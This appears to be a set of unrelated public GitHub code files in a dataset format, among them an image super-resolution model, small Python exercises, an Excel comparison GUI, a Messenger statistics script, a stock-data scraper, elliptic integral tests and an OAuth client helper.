self.lq_std.to(lq)\n self.gt_mean = self.gt_mean.to(gt)\n self.gt_std = self.gt_std.to(gt)\n lq = (lq - self.lq_mean) / self.lq_std\n gt = (gt - self.gt_mean) / self.gt_std\n\n # generator\n pred = self.generator(lq, coord, cell)\n\n # loss\n losses = dict()\n log_vars = dict()\n losses['loss_pix'] = self.pixel_loss(pred, gt)\n\n # parse loss\n loss, log_vars = self.parse_losses(losses)\n\n # optimize\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n log_vars.pop('loss') # remove the unnecessary 'loss'\n outputs = dict(\n log_vars=log_vars,\n num_samples=len(gt.data),\n results=dict(lq=lq.cpu(), gt=gt.cpu(), output=pred.cpu()))\n\n return outputs\n\n def forward_test(self,\n lq,\n gt,\n coord,\n cell,\n meta=None,\n save_image=False,\n save_path=None,\n iteration=None):\n \"\"\"Testing forward function.\n\n Args:\n lq (Tensor): LQ image.\n gt (Tensor): GT image.\n coord (Tensor): Coord tensor.\n cell (Tensor): Cell tensor.\n meta (list[dict]): Meta data, such as path of GT file.\n Default: None.\n save_image (bool): Whether to save image. Default: False.\n save_path (str): Path to save image. Default: None.\n iteration (int): Iteration for the saving image name.\n Default: None.\n\n Returns:\n dict: Output results, which contain either key(s)\n 1. 'eval_result'.\n 2. 'lq', 'pred'.\n 3. 
'lq', 'pred', 'gt'.\n \"\"\"\n\n # norm\n self.lq_mean = self.lq_mean.to(lq)\n self.lq_std = self.lq_std.to(lq)\n lq = (lq - self.lq_mean) / self.lq_std\n\n # generator\n with torch.no_grad():\n pred = self.generator(lq, coord, cell, test_mode=True)\n self.gt_mean = self.gt_mean.to(pred)\n self.gt_std = self.gt_std.to(pred)\n pred = pred * self.gt_std + self.gt_mean\n pred.clamp_(0, 1)\n\n # reshape for eval\n ih, iw = lq.shape[-2:]\n s = math.sqrt(coord.shape[1] / (ih * iw))\n shape = [lq.shape[0], round(ih * s), round(iw * s), 3]\n pred = pred.view(*shape).permute(0, 3, 1, 2).contiguous()\n if gt is not None:\n gt = gt.view(*shape).permute(0, 3, 1, 2).contiguous()\n\n if self.test_cfg is not None and self.test_cfg.get('metrics', None):\n assert gt is not None, (\n 'evaluation with metrics must have gt images.')\n results = dict(eval_result=self.evaluate(pred, gt))\n else:\n results = dict(lq=lq.cpu(), output=pred.cpu())\n if gt is not None:\n results['gt'] = gt.cpu()\n\n # save image\n if save_image:\n gt_path = meta[0]['gt_path']\n folder_name = osp.splitext(osp.basename(gt_path))[0]\n if isinstance(iteration, numbers.Number):\n save_path = osp.join(save_path, folder_name,\n f'{folder_name}-{iteration + 1:06d}.png')\n elif iteration is None:\n save_path = osp.join(save_path, f'{folder_name}.png')\n else:\n raise ValueError('iteration should be number or None, '\n f'but got {type(iteration)}')\n mmcv.imwrite(tensor2img(pred), save_path)\n\n return results\n\n def init_weights(self, pretrained=None, strict=True):\n \"\"\"Init weights for models.\n\n Args:\n pretrained (str, optional): Path for pretrained weights. If given\n None, pretrained weights will not be loaded. Defaults to None.\n strict (bool, optional): Whether to strictly load the pretrained model.\n Defaults to True.\n \"\"\"\n\n self.generator.init_weights(pretrained, strict)\n","repo_name":"IceClear/CLIP-IQA","sub_path":"mmedit/models/restorers/liif.py","file_name":"liif.py","file_ext":"py","file_size_in_byte":6322,"program_lang":"python","lang":"en","doc_type":"code","stars":190,"dataset":"github-code","pt":"79"} +{"seq_id":"3538519689","text":"# Faça um programa que leia três números inteiros e mostre qual é o maior e qual é o menor.\r\n\r\nnum = []\r\nmaior = None\r\nmenor = None\r\nfor i in range(0,3):\r\n num.append(int(input(f'Entre com o {i+1}º números: ')))\r\n\r\n if maior is None or num[i] > maior:\r\n maior = num[i]\r\n if menor is None or num[i] < menor:\r\n menor = num[i]\r\n\r\nprint(f'O menor número é {menor}')\r\nprint(f'O maior número é {maior}')\r\n","repo_name":"GuuhRodrigues/Python_funcional","sub_path":"ex34.py","file_name":"ex34.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"11331097142","text":"# This script is a combination of Find difference and Compare definition\n__version__ = \"1.1.0\"\nimport tkinter as tk\n\nimport compare_excels as fd\nimport compare_by_key as cd\n\n\ndef setup_gui():\n # Creation of GUI\n\n def exit_():\n root.destroy()\n root.quit()\n\n root = tk.Tk()\n \n screen_width = root.winfo_screenwidth()\n screen_height = root.winfo_screenheight()\n window_width = 400\n window_height = 150\n center_x = int(screen_width / 2 - window_width / 2)\n center_y = int(screen_height / 2 - window_height / 2)\n\n root.title(\"Find difference\")\n root.geometry(f'{window_width}x{window_height}+{center_x}+{center_y}')\n btn1 = tk.Button(\n root,\n text='Compare two excels',\n command=lambda: fd.start(root),\n padx=15,\n pady=5\n )\n\n 
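# Editorial note: the command callbacks are wrapped in lambdas so fd.start(root)\n # and cd.start(root) only run when a button is clicked; passing the bare call\n # would execute it immediately while the window is still being built.\n 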
btn1.pack(expand=True, side=tk.TOP)\n\n btn2 = tk.Button(\n root,\n text='Compare to excels by unique key',\n command=lambda: cd.start(root),\n padx=20,\n pady=5\n )\n btn2.pack(expand=True, side=tk.TOP)\n\n btn3 = tk.Button(\n root,\n text='Exit',\n command=exit_,\n padx=25,\n pady=5\n )\n btn3.pack(expand=True, side=tk.BOTTOM)\n\n tk.mainloop()\n\n\nif __name__ == '__main__':\n setup_gui()\n","repo_name":"AlVlZak/Compare-Excel-files","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14330546670","text":"import ast\nimport os\nimport sys\n\nfrom inspect import signature\nfrom parameters import *\n\nfrom essentials import convert_to_list\nfrom essentials import convert_to_list_nested\nfrom graphs import draw_plot\nfrom graphs import draw_combined_plot\nimport calculate as cal\nimport essentials\nimport counters as count\nimport datetime as dt\n\n\ndef stat_call(data_range: Filepart):\n\n smaller_functions = [(cal.emoji_all_count,\n \"Liczba otrzymanych reakcji pod swoimi wiadomościami\",\n \"Stosunek otrzymanych reakcji do napisanych wiadomości przez użytkownika\"), # emoji count\n (cal.emoji_heart_count,\n \"Liczba otrzymanych serduszek pod wiadomościami na konwersacji\",\n \"Stosunek otrzymanych serduszek do napisanych wiadomości przez użytkownika\"), # heart count\n (cal.giving_reactions,\n \"Liczba dawanych reakcji pod wiadomościami\",\n \"Stosunek dawanych reakcji do napisanych wiadomości przez użytkownika\"), # giving reactions\n (cal.find_word,\n \"Liczba napisanych '\" + values.find_word + \"' przez użytkownika\",\n \"Stosunek napisanych '\" + values.find_word + \"' do napisanych wiadomości przez użytkownika\")] # word count\n\n # all messages\n all_messages = cal.message_count(data_range)\n\n # draw all messages plot\n draw_plot(convert_to_list(all_messages), \"Liczba wiadomości wysłanych przez osoby\",\n values.save_graphs, values.path, 1)\n\n for count, function in zip(range(2, len(smaller_functions)+2), smaller_functions):\n calculate_and_draw(function[0], data_range,\n function[1], count, all_messages, function[2], len(smaller_functions)+1)\n\n # multimedia data\n multimedia_messages = cal.multimedia(data_range)\n\n # draw multimedia plot\n draw_combined_plot(convert_to_list_nested(multimedia_messages), \"Liczba multimediów wysłanych przez osoby\",\n values.save_graphs, values.path, len(smaller_functions)+2)\n\n\ndef calculate_and_draw(function, data_range, title, number, all_messages, ratio_title, function_count):\n # calculate\n if len(signature(function).parameters) > 1:\n result = function(data_range, values.find_word)\n else:\n result = function(data_range)\n\n draw_plot(convert_to_list(result), title,\n values.save_graphs, values.path, number)\n draw_plot(convert_to_list(cal.ratio(result, all_messages)),\n ratio_title, values.save_graphs, values.path, number+function_count)\n\n\ndef count_call(data_range: Filepart):\n count.print_keys(data_range)\n # words = count.count_words(data_range)\n # words = essentials.remove_small(words, 1000)\n # draw_plot(convert_to_list(words), \"Liczba napisanych słów\",values.save_graphs, values.path,0)\n\n\ndef get_selected_files():\n # * Get data from files\n my_files_name = []\n os.chdir(values.messages_directory)\n for file in os.listdir():\n if file.endswith(\".json\"):\n my_files_name.append(file)\n my_json = list(map(essentials.read_json, my_files_name))\n os.chdir(\"..\") # Exit from folder 
with messages\n return my_json\n\n\ndef remove_duplicated_messages(my_json):\n # * Remove duplicates\n users = set()\n messages = set()\n for file in my_json:\n for message in file[\"messages\"]:\n messages.add(str(message))\n for user in file[\"participants\"]:\n users.add(str(user))\n new_json = {}\n new_json[\"messages\"] = [ast.literal_eval(message) for message in messages]\n new_json[\"users\"] = [ast.literal_eval(user) for user in users]\n return new_json\n\n\n# main function\ndef main():\n\n my_json = get_selected_files()\n new_json = remove_duplicated_messages(my_json)\n # Convert given dates to unix\n start_date = essentials.date_to_unix(values.start_date_values)\n end_date = essentials.date_to_unix(values.end_date_values)\n\n print(\n # sys.argv[1],\n f'oldest: {format_time(cal.find_time(new_json) / 1000)}',\n f'newest: {format_time(cal.find_time(new_json, max) / 1000)}',\n f'message count: {len(new_json[\"messages\"])}', sep=\" | \")\n\n data_range = Filepart(new_json, start_date, end_date)\n stat_call(data_range)\n # count_call(data_range)\n\n\ndef format_time(timestamp):\n file_time = dt.datetime.fromtimestamp(timestamp)\n return file_time.strftime(\"%d-%m-%Y\")\n\n\ndef read_args():\n if len(sys.argv) < 5 or sys.argv[1][0] == '-':\n print(\"Usage:\" + sys.argv[\n 0] + \" \")\n sys.exit(1)\n else:\n files = sys.argv[1]\n start_date = [int(i) for i in sys.argv[2][1:-1].split(\",\")]\n end_date = [int(i) for i in sys.argv[3][1:-1].split(\",\")]\n word = sys.argv[4]\n save = bool(sys.argv[5] == \"True\")\n if save == True:\n path = sys.argv[6]\n print(path)\n else:\n path = \"\"\n return Parameters(files, start_date, end_date, word, save, path)\n\n\n# function for testing single counters\ndef test():\n my_json = get_selected_files()\n new_json = remove_duplicated_messages(my_json)\n # Convert given dates to unix\n start_date = essentials.date_to_unix(values.start_date_values)\n end_date = essentials.date_to_unix(values.end_date_values)\n\n print(\n # sys.argv[1],\n f'oldest: {format_time(cal.find_time(new_json) / 1000)}',\n f'newest: {format_time(cal.find_time(new_json, max) / 1000)}',\n f'message count: {len(new_json[\"messages\"])}', sep=\" | \")\n\n data_range = Filepart(new_json, start_date, end_date)\n\n # all messages\n all_messages = cal.message_count(data_range)\n\n # draw all messages plot\n draw_plot(convert_to_list(all_messages), \"Liczba wiadomości wysłanych przez osoby\",\n values.save_graphs, values.path, 1)\n\n # multimedia\n multimedia_messages = cal.multimedia(data_range)\n\n # draw multimedia chart\n draw_combined_plot(convert_to_list_nested(multimedia_messages), \"Liczba multimediów wysłanych przez osoby\",\n values.save_graphs, values.path, 2)\n\n\n# ACTIVATE!\nif __name__ == \"__main__\":\n values = read_args()\n main()\n # test()\n","repo_name":"Byczax/messenger_graphs_statistics","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6452,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"79"} +{"seq_id":"73096352255","text":"'''\r\n작성일 : 2023년 9월 27일\r\n학과 : 컴퓨터공학부\r\n학번 : 202395001\r\n이름 : 구민수\r\n설명 : 반복문으로 펙초리얼 구하기\r\n'''\r\nnum = int(input(\"정수를 입력하시오: \"))\r\nfact = 1\r\n\r\n# 1부터 num까지의 숫자를 곱하여 팩토리얼을 계산\r\nfor i in range(1, num + 1):\r\n fact *= i\r\n\r\nprint(f\"{num}의 팩토리얼은 
{fact}입니다.\")\r\n","repo_name":"westerdif/Data_science","sub_path":"Data_Science_Kms/Chapter5/06_lab_3.py","file_name":"06_lab_3.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"8841023479","text":"'''\nSet of procedures to deal with branches\n'''\nfrom TraverseOperations import CopyTraverseInstance\n\nclass BranchCopy:\n def __init__(self, BranchName, Branches): \n '''\n Makes a copy of branch instance\n Removes branches if same as BranchName PntRefNum\n :param BranchName: Name of branch in Branches\n :param Branches:\n '''\n self.Branches = Branches\n self.BranchName = BranchName\n \n def GetCopy(self):\n\n #get branch instance from Branches\n Branch = self.Branches.__getattribute__(self.BranchName)\n #make a copy of branch\n Branch = CopyTraverseInstance.TraverseCopy(Branch)\n \n #set PntRefNum\n PntRefNum = self.BranchName.split(\"_\")[0]\n \n #remove branches corresponding to BranchName or PntRefNum\n Branch = self.CleanUpBranches(Branch, PntRefNum)\n \n return Branch, PntRefNum\n \n def CleanUpBranches(self, traverse, PntRefNum):\n '''\n removes branches from primary, secondary and NonRM lists if they are\n equal to PntRefNum or BranchName\n :param traverse: \n :param PntRefNum: \n :param BranchName: \n :return: traverse\n '''\n \n #primary branches\n traverse.PrimaryBranches = self.removeBranches(traverse.PrimaryBranches,\n PntRefNum)\n # secondary branches\n traverse.SecondaryBranches = self.removeBranches(traverse.SecondaryBranches,\n PntRefNum)\n # primary branches\n traverse.NonRmBranches = self.removeBranches(traverse.NonRmBranches,\n PntRefNum)\n \n return traverse\n \n def removeBranches(self, BranchList, PntRefNum):\n \n if PntRefNum in BranchList:\n BranchList.remove(PntRefNum)\n elif self.BranchName in BranchList:\n BranchList.remove(self.BranchName)\n \n return BranchList\n \ndef GetTraverseBranchNumber(Branches, PntRefNum):\n '''\n In the case of multiple branches from a single point,\n gets an increment number and adds it to the traverse reference in Branches\n :return:\n '''\n\n counter = 0\n for key in Branches.__dict__.keys():\n if key == PntRefNum and counter == 0:\n counter = 1\n elif PntRefNum == key.split(\"_\")[0]:\n increment = int(key.split(\"_\")[1])\n if counter <= increment:\n counter = increment + 1\n\n if counter == 0:\n return PntRefNum\n else:\n return (PntRefNum + \"_\" + str(counter))\n\nclass RemoveTriedBranches:\n def __init__(self, Branches, BranchName):\n self.Branches = Branches\n self.BranchName = BranchName\n\n def RemoveBranchInstance(self):\n '''\n Loops through all Branches in self.Branches and removes BranchName from\n primaryBranches\n :return:\n '''\n\n for key in self.Branches.__dict__.keys():\n Branch = self.Branches.__getattribute__(key)\n if key == \"FirstBranch\" or Branch.__class__.__name__ == \"list\" or \\\n Branch.__class__.__name__ == \"BranchSubClass\" or key == \"CurrentBranch\":\n continue #not a Branch instance - descriptive attributes of Branch class\n \n if self.BranchName in Branch.PrimaryBranches:\n Branch.PrimaryBranches.remove(self.BranchName)\n\n return self.Branches\n \nclass AddBranch:\n def __init__(self, ConnectionFinder, Branches, traverse, PntRefNum, \n LandXML_Obj, Observation):\n '''\n Checks if branch should be created and added to Branches\n Updates Branch Lists\n :param ConnectionFinder: \n :param Branches: \n '''\n \n self.ConnectionFinder = ConnectionFinder\n self.Branches = Branches\n self.traverse = 
traverse\n self.PntRefNum = PntRefNum\n self.LandXML_Obj = LandXML_Obj\n self.Observation = Observation\n \n def AddBranchInstance(self):\n \n if not self.CheckBranchExists():\n if self.ConnectionFinder.PrimaryBranch or \\\n (self.ConnectionFinder.SecondaryBranch and self.LandXML_Obj.TraverseProps.MixedTraverse):\n self.traverse.PrimaryBranches = self.CreateBranch(self.traverse.PrimaryBranches)\n elif self.ConnectionFinder.SecondaryBranch:\n self.traverse.SecondaryBranches = self.CreateBranch(self.traverse.SecondaryBranches)\n elif self.ConnectionFinder.NonRmBranch and self.LandXML_Obj.TraverseProps.MixedTraverse:\n self.traverse.NonRmBranches = self.CreateBranch(self.traverse.NonRmBranches)\n \n return self.Branches, self.traverse\n \n def CheckBranchExists(self):\n #Check if branch instance already exists\n exists = False\n BranchLabel = None\n for key in self.Branches.__dict__.keys():\n Branch = self.Branches.__getattribute__(key)\n try:\n if key == \"FirstBranch\" or Branch.__class__.__name__ == \"list\" or \\\n Branch.__class__.__name__ == \"BranchSubClass\" or key == \"CurrentBranch\":\n continue\n BranchPnts = Branch.refPnts\n\n if BranchPnts == self.traverse.refPnts:\n #self.AddObservationTrying()\n return True\n break\n except AttributeError:\n pass\n \n return False\n \n \n def CreateBranch(self, BranchList):\n '''\n Creates a branch instance in slef.Branches\n :return: \n '''\n\n BranchLabel = GetTraverseBranchNumber(self.Branches, self.PntRefNum)\n BranchList.append(BranchLabel)\n # create a traverse copy instance and add to Branches\n travCopy = CopyTraverseInstance.TraverseCopy(self.traverse)\n # Add name of parent traverse branch\n setattr(travCopy, \"ParentBranch\", self.traverse.BranchName)\n setattr(travCopy, \"TriedObservation\", self.Observation)\n # get reference number for branch\n setattr(self.Branches, BranchLabel, travCopy)\n \n return BranchList\n \n \n \n\n","repo_name":"sparkes-intrax/CadastreCalcsUI","sub_path":"src/LandXML/BranchOperations.py","file_name":"BranchOperations.py","file_ext":"py","file_size_in_byte":6373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14251657200","text":"import sys\nsys.stdin = open('G.txt')\n\n\ndef get_count(matrix):\n global n, m\n # 나무 판자의 개수\n tree = 0\n\n # '-'를 만났을때 다음칸이 범위를 벗어나거나 '|'를 만나면 판자의 개수 추가\n # '|'를 만났을때 다음행이 범위를 벗어나거나 '_'를 만나면 판자의 개수 추가\n for row in range(n):\n for col in range(m):\n # 해당 값이 -라면\n if matrix[row][col] == '-':\n # 범위를 벗어나지 않고\n if 0 <= col+1 < m:\n # |를 만난다면\n if matrix[row][col+1] == \"|\":\n tree += 1\n else:\n # 범위를 벗어난다면\n tree += 1\n\n # 해당 값이 |라면\n if matrix[row][col] == '|':\n # 범위를 벗어나지 않고\n if 0 <= row+1 < n:\n #-를 만난다면\n if matrix[row+1][col] == \"-\":\n tree += 1\n else:\n # 범위를 벗어난다면 \n tree += 1\n\n return tree\n\n\nn, m = map(int, input().split())\nmatrix = [list(map(str, input())) for _ in range(n)]\n\nanswer = get_count(matrix)\nprint(answer)","repo_name":"woohree/ALGO2ITHM_STUDY","sub_path":"baekjoon/03월/0317 연산자끼워넣기 퇴사 바닥장식/s4_1388_바닥장식/yeonggyeong.py","file_name":"yeonggyeong.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"6663019083","text":"#!/usr/bin/python\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom multiprocessing import Process\nfrom time import sleep\nimport math\n\n\nA = 48.8\nn = 1.5\nstart = 45\ncross = 30\ntitle='two algorithm (rssi => distance)'\n\ndef d1(txPower, 
rssi):\n if (rssi == 0):\n return -1.0; # if we cannot determine accuracy, return -1.\n\n ratio = rssi*1.0/txPower;\n if (ratio < 1.0):\n return math.pow(ratio,10);\n else:\n accuracy = (0.89976)*math.pow(ratio,7.7095) + 0.111\n return accuracy\n\ndef d2(rssi):\n power = (abs(rssi)- A)/(10.0 * n)\n # print(\" \", power)\n distance = math.pow(10, power)\n return distance\n\n\ndef test():\n # print(d1(A, 78))\n # print(d2(78))\n x = list(range(start, start + cross))\n dd1 = []\n dd2 = []\n for i in x:\n dd1.append(d1(A, i))\n dd2.append(d2(i))\n\n plt.plot(x,dd1,color='b', label='algo from github')\n plt.plot(x,dd2,color='r', label='algo from csdn')\n for i in range(cross):\n if x[i] % 5 == 0:\n plt.annotate(\"(%s)\" % round(dd1[i], 2), xy=(x[i], dd1[i]))\n plt.annotate(\"(%s)\" % round(dd2[i], 2), xy=(x[i], dd2[i] + 5))\n\n plt.xlabel(\"rssi/dbm\")\n plt.ylabel(\"distance/m\")\n plt.legend()\n plt.title('A=%s, n=%s, title=%s' % (A, n, title))\n plt.show()\n\nif __name__ == '__main__':\n test()\n","repo_name":"ginhton/3dpositioning","sub_path":"src/rssi2distance.py","file_name":"rssi2distance.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"36469539969","text":"import requests\nimport lxml.html as lh\nimport pandas as pd\nimport numpy as np\n\n### VUG Data\nurl='https://finance.yahoo.com/quote/VUG/history?p=VUG'\npage=requests.get(url)\ndoc=lh.fromstring(page.content)\n\ntr_elements = doc.xpath('//tr')\nfor T in tr_elements:\n if len(T) < 7:\n tr_elements.remove(T)\n\ntr_elements = doc.xpath('//tr')\ncol=[]\ni=0\n\nfor t in tr_elements[0]:\n i+=1\n name=t.text_content()\n col.append((name,[]))\n\nfor j in range(1,len(tr_elements)):\n T=tr_elements[j]\n if len(T) != 7:\n continue\n i=0\n for t in T.iterchildren():\n data=t.text_content()\n if i>0:\n try:\n data=int(data)\n except:\n pass\n col[i][1].append(data)\n i+=1\n\nDict1 = {title:val for (title,val) in col}\ndf1=pd.DataFrame(Dict1)\nvug = df1[['Date', 'Adj Close**']].copy()\nvug_new = vug.rename(columns={'Date':'VUG Date', 'Adj Close**':'VUG Adj Close'})\nvug_new['VUG Adj Close'] = vug_new['VUG Adj Close'].astype(float)\n\n### VTV Data\nurl='https://finance.yahoo.com/quote/vtv/history?p=vtv'\npage=requests.get(url)\ndoc=lh.fromstring(page.content)\n\ntr_elements = doc.xpath('//tr')\nfor T in tr_elements:\n if len(T) < 7:\n tr_elements.remove(T)\n\ntr_elements = doc.xpath('//tr')\ncol=[]\ni=0\n\nfor t in tr_elements[0]:\n i+=1\n name=t.text_content()\n col.append((name,[]))\n\nfor j in range(1,len(tr_elements)):\n T=tr_elements[j]\n if len(T) != 7:\n continue\n i=0\n for t in T.iterchildren():\n data=t.text_content()\n if i>0:\n try:\n data=int(data)\n except:\n pass\n col[i][1].append(data)\n i+=1\n\nDict2 = {title:val for (title,val) in col}\ndf2=pd.DataFrame(Dict2)\nvtv = df2[['Date', 'Adj Close**']].copy()\nvtv_new = vtv.rename(columns={'Date':'VTV Date', 'Adj Close**':'VTV Adj Close'})\nvtv_new['VTV Adj Close'] = vtv_new['VTV Adj Close'].astype(float)\n\n#Combined Dataframes (contains date column & adj close column for VUG & VTV)\nframes = [vug_new, vtv_new]\nnew_df = pd.concat(frames, axis=1)\nlength = len(new_df)\n\n#Created VUG/VTV\ndef ratioAdjClose():\n new_df['VUG/VTV'] = new_df['VUG Adj Close'] / new_df['VTV Adj Close']\n\nratioAdjClose()\n\n#Set new columns in dataframe to null\nNaN = np.nan\n\n#Created Fast MA (10 days)\nnew_df['Fast Ma'] = NaN\ndef fastMA():\n x=0\n y=10\n l=9\n while (y<(length+1)):\n ratio = 
new_df.iloc[x:y,4]\n sumOfRows = ratio.sum()\n fastMA = sumOfRows/10\n new_df.at[l,'Fast Ma'] = fastMA\n x=x+1\n y=y+1\n l=l+1\n\nfastMA()\n\n#Created Slow MA (40 days)\nnew_df['Slow Ma'] = NaN\ndef slowMA():\n x=0\n y=40\n l=39\n while (y<(length+1)):\n ratio = new_df.iloc[x:y,4]\n sumOfRows = ratio.sum()\n slowMA = sumOfRows/40\n new_df.at[l,'Slow Ma'] = slowMA\n x=x+1\n y=y+1\n l=l+1\n\nslowMA()\n\n#Created Fast-Slow\nnew_df['Fast-Slow'] = NaN\ndef fastMinusSlow():\n new_df['Fast-Slow'] = new_df['Fast Ma'] - new_df['Slow Ma']\n\nfastMinusSlow()\n\n#Created Buy VUG Return\nnew_df['Buy VUG Return'] = NaN\ndef buyReturnVUG():\n x=38\n y=39\n l=39\n while (y 0:\n buyVUG = (currVUG/initVUG) - 1\n new_df.at[l,'Buy VUG Return'] = buyVUG\n else:\n new_df.at[l,'Buy VUG Return'] = 0\n x=x+1\n y=y+1\n l=l+1\n\nbuyReturnVUG()\n\n#Created Buy VTV Return\nnew_df['Buy VTV Return'] = NaN\ndef buyReturnVTV():\n x=38\n y=39\n l=39\n while (y None:\n n_test = 1000\n\n device = torch.device(\"mps\")\n\n vmap_ellipk = vmap(t_ellipk_new)\n vmap_ellipe = vmap(t_ellipe_new)\n\n test_k = torch.arange(-2, 0.9, 2.9 / n_test, dtype=torch.float32, device=device)\n test_k[-1] = 0.0\n\n tic = time.perf_counter()\n ek_scipy = t_ellipk(test_k)\n s_epk = time.perf_counter() - tic\n\n tic = time.perf_counter()\n ek_n = vmap_ellipk(test_k)\n t_epk = time.perf_counter() - tic\n\n assert_close(ek_scipy, ek_n)\n\n test_e = torch.arange(-1, 1, 2.0 / n_test, dtype=torch.float32, device=device)\n test_e[-1] = 0.0\n\n tic = time.perf_counter()\n ee_scipy = t_ellipe(test_e)\n s_epe = time.perf_counter() - tic\n\n tic = time.perf_counter()\n ee_n = vmap_ellipe(test_e)\n t_epe = time.perf_counter() - tic\n\n assert_close(ee_scipy, ee_n)\n\n data = {\n \"Name\": [\"scipy_ellipe\", \"scipy_ellipk\", \"vamp_ellipe\", \"vmap_ellipk\"],\n \"Elapsed time (s)\": [s_epe, s_epk, t_epe, t_epk],\n }\n table = Report(f\"Time comparison for elliptic integral\\nn={n_test}\", data)\n table.display()\n\n\ndef test_new_elliptic() -> None:\n n_test = 1000000\n\n device = torch.device(\"cpu\")\n\n test_k = torch.arange(-2, 0.95, 2.95 / n_test, device=torch.device(\"cpu\")).to(\n device=device\n )\n test_k[-1] = 0.0\n\n tic = time.perf_counter()\n s_test = t_ellipk(test_k)\n s_epk = time.perf_counter() - tic\n\n tic = time.perf_counter()\n t_test = t_ellipk_new(test_k)\n n_epk = time.perf_counter() - tic\n\n assert_close(s_test, t_test)\n\n tic = time.perf_counter()\n s_test = t_ellipe(test_k)\n s_epe = time.perf_counter() - tic\n\n tic = time.perf_counter()\n t_test = t_ellipe_new(test_k)\n n_epe = time.perf_counter() - tic\n\n assert_close(s_test, t_test)\n\n\ndef test_elliptic_integral() -> None:\n n_test = 1000\n\n device = torch.device(\"cpu\")\n dtype = torch.float64\n\n test_k = torch.arange(-2, 0.9, 2.9 / n_test, dtype=dtype, device=device)\n\n tic = time.perf_counter()\n s_test = ellipk(test_k)\n s_epk = time.perf_counter() - tic\n\n tic = time.perf_counter()\n t_test = t_ellipk(test_k)\n t_epk = time.perf_counter() - tic\n\n assert_close(s_test, t_test)\n\n test_e = torch.arange(-1, 1, 2.0 / n_test, dtype=dtype, device=device)\n\n tic = time.perf_counter()\n s_test = ellipe(test_e)\n s_epe = time.perf_counter() - tic\n\n tic = time.perf_counter()\n t_test = t_ellipe(test_e)\n t_epe = time.perf_counter() - tic\n\n assert_close(s_test, t_test)\n\n if torch.backends.mps.is_available(): # type: ignore\n device = torch.device(\"mps\")\n dtype = torch.float32\n\n test_e = test_e.to(device=device, dtype=dtype)\n tic = time.perf_counter()\n g_test = 
t_ellipe(test_e)\n g_epe = time.perf_counter() - tic\n\n assert_close(\n s_test.to(dtype=dtype), g_test.to(device=s_test.device, dtype=dtype)\n )\n\n elif torch.cuda.is_available():\n device = torch.device(\"cuda\")\n dtype = torch.float64\n\n test_e = test_e.to(device=device, dtype=dtype)\n tic = time.perf_counter()\n g_test = t_ellipe(test_e)\n g_epe = time.perf_counter() - tic\n\n assert_close(\n s_test.to(dtype=dtype), g_test.to(device=s_test.device, dtype=dtype)\n )\n else:\n g_epe = float(\"nan\") # a plain string here would crash the :.5f format below\n\n table = Table(title=f\"Elliptic integral Performance, n={n_test}\")\n table.add_column(\"Name\", justify=\"center\", style=\"cyan\")\n table.add_column(r\"Elapsed time \\[s]\", justify=\"center\", style=\"green\")\n\n names = [\n \"scipy_ellipe\",\n \"scipy_ellipk\",\n \"torch_ellipe\",\n \"torch_ellipk\",\n \"torch (gpu)\",\n ]\n times = [s_epe, s_epk, t_epe, t_epk, g_epe]\n\n for k, v in zip(names, times):\n table.add_row(k, f\"{v:.5f}\")\n\n console.print(table)\n","repo_name":"kyoungseoun-chung/pymytools","sub_path":"tests/test_special.py","file_name":"test_special.py","file_ext":"py","file_size_in_byte":4371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6009201227","text":"from rauth import OAuth1Service, OAuth2Service\n\n\nclass BaseConnect(object):\n session = None\n service = None\n\n def __init__(self, client_id, secret, name, authorize_url,\n access_token_url, base_url):\n self.service = OAuth2Service(\n client_id=client_id,\n client_secret=secret,\n name=name,\n authorize_url=authorize_url,\n access_token_url=access_token_url,\n base_url=base_url)\n\n def get_authorize_url(self, **kwargs):\n if not kwargs.get('redirect_uri'):\n raise Exception('You must provide a redirect_uri to this function')\n\n return self.service.get_authorize_url(**kwargs)\n\n def get_session(self, code, redirect_uri, **kwargs):\n if self.session:\n return self.session\n\n kwargs.update({'code': code, 'redirect_uri': redirect_uri})\n self.session = self.service.get_auth_session(data=kwargs)\n return self.session\n\n def get_access_token(self, redirect_uri):\n return self.service.get_access_token(\n params={\n 'redirect_uri': redirect_uri,\n 'grant_type': 'client_credentials',\n })\n\n\nclass TwitterConnect(BaseConnect):\n \"\"\"\n Flow to authenticate a user:\n - get_request_token()\n - get_authorize_url()\n - redirects user to authorize_url and get the oauth_verifier in the\n callback\n - get_auth_session(oauth_verifier)\n\n You'll end up with a rauth.session.OAuth1Session and you can call\n anything in the twitter api by doing:\n\n Eg:\n # get the info about the logged-in user\n session.get('account/verify_credentials.json')\n \"\"\"\n access_token_url = 'https://api.twitter.com/oauth/access_token'\n authorize_url = 'https://api.twitter.com/oauth/authorize'\n request_token_url = 'https://api.twitter.com/oauth/request_token'\n base_url = 'https://api.twitter.com/1.1/'\n request_token = None\n\n def __init__(self, consumer_key, consumer_secret):\n self.service = OAuth1Service(\n consumer_key=consumer_key,\n consumer_secret=consumer_secret,\n name='twitter',\n access_token_url=self.access_token_url,\n authorize_url=self.authorize_url,\n request_token_url=self.request_token_url,\n base_url=self.base_url\n )\n\n def get_request_token(self):\n self.request_token, self.request_token_secret = \\\n self.service.get_request_token()\n\n def get_authorize_url(self):\n if not self.request_token:\n raise Exception('You should call get_request_token first')\n 
